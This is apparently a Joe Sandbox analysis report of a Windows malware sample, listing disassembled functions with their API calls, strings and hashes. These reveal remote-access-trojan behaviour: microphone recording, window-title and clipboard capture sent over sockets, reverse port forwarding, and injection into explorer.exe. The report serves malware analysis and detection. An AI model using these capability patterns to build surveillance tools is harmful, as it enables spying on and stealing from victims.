                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID: \&G$\&G$`&G
                                      • API String ID: 269201875-253610517
                                      • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                      • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                      • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                      • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                      • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                      • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                      • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0040AD38
                                      • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                      • GetForegroundWindow.USER32 ref: 0040AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                      • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                      • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                      • Opcode Fuzzy Hash: feb8edceca8c1d3b0438b79f4b5d8782787a457fd28da8b62aac7c6790c891ec
                                      • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                      • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                      • Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
                                      • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                      • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                      • __dosmaperr.LIBCMT ref: 0043A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                      • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                      • __dosmaperr.LIBCMT ref: 0043A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                      • __dosmaperr.LIBCMT ref: 0043A937
                                      • _free.LIBCMT ref: 0043A943
                                      • _free.LIBCMT ref: 0043A94A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                      • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                      • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                      • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 004054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                      • TranslateMessage.USER32(?), ref: 0040557E
                                      • DispatchMessageA.USER32(?), ref: 00405589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                      • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                      • Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
                                      • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: 0VG$0VG$<$@$Temp
                                      • API String ID: 1704390241-2575729100
                                      • Opcode ID: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                      • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                      • Opcode Fuzzy Hash: 1c1b3640276c9f2484efac8a9a88c7dcef26998f5c3edd0453bd207f6b4608f6
                                      • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 00416941
                                      • EmptyClipboard.USER32 ref: 0041694F
                                      • CloseClipboard.USER32 ref: 00416955
                                      • OpenClipboard.USER32 ref: 0041695C
                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                      • CloseClipboard.USER32 ref: 00416984
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID: !D@
                                      • API String ID: 2172192267-604454484
                                      • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                      • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                      • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                      • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                      • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                      • CloseHandle.KERNEL32(?), ref: 00413465
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                      • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                      • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                      • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                      • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                      • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                      • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00448135
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00448141
                                      • _free.LIBCMT ref: 0044814C
                                      • _free.LIBCMT ref: 00448157
                                      • _free.LIBCMT ref: 00448162
                                      • _free.LIBCMT ref: 0044816D
                                      • _free.LIBCMT ref: 00448178
                                      • _free.LIBCMT ref: 00448183
                                      • _free.LIBCMT ref: 0044818E
                                      • _free.LIBCMT ref: 0044819C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                      • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                      • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                      • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                      • API String ID: 3578746661-3604713145
                                      • Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                      • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                      • Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
                                      • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                      • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                      • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                      • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                      • __fassign.LIBCMT ref: 0044B479
                                      • __fassign.LIBCMT ref: 0044B494
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                      • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID: PkGNG
                                      • API String ID: 1324828854-263838557
                                      • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                      • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                      • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                      • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • Sleep.KERNEL32(00000064), ref: 00417521
                                      • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                      • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                      • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                      • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\NvbYSEq.exe), ref: 0040749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                      • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                      • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                      • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strftime.LIBCMT ref: 00401D50
                                        • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                      • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                      • API String ID: 3809562944-243156785
                                      • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                      • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                      • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                                      • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                      • int.LIBCPMT ref: 00410E81
                                        • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                        • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                      • __Init_thread_footer.LIBCMT ref: 00410F29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID: ,kG$0kG
                                      • API String ID: 3815856325-2015055088
                                      • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                      • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                      • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                                      • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                      • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                      • waveInStart.WINMM ref: 00401CFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID: dMG$|MG$PG
                                      • API String ID: 1356121797-532278878
                                      • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                      • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                      • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                                      • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                        • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                        • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                        • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
